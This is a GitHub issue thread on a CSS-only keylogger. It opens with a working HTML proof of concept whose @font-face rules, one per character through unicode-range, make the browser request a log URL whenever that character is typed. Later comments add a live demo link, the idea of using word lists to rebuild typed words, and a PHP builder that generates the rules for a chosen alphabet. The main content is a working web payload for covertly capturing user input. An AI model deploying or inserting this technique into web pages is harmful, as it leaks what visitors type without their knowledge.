Keylogger using webfont with single character unicode-range
Opened this issue · 4 comments
myfonj commented
Sure, again just a single request per unique character during page visit could be sent, but besides that it seems to work as expected:
<!doctype html>
<title>css keylogger</title>
<style>
@font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
</style>
<input value="a">type `bcd` and watch network log
julianYaman commented
Why do you not make a pull request with these changes :D
Bogdaan commented
@myfonj briliant idia. Live demo - https://jsfiddle.net/hcbogdan/6hmm2z47/
jbtronics commented
Very cool idea. Seems interesting. The problem is that we can only detect if a user types a char for the first time... But with word lists it should maybe possible to guess the text a user has typed (at least when it is only a single word...)
Bogdaan commented
I wrote some code at
https://github.com/Bogdaan/spycss/blob/master/src/Interaction/Keylogger.php
Witch generates valid unicode-range: U+XXXX from alplabet.
For example:
// set alphabet
$logThisChars = 'abcdefgABCDEFG';
// create input field
echo $s->builder()
->tag('input')
->attribute('name', 'field')
->interactions([
new Keylogger($logThisChars)
])
->get();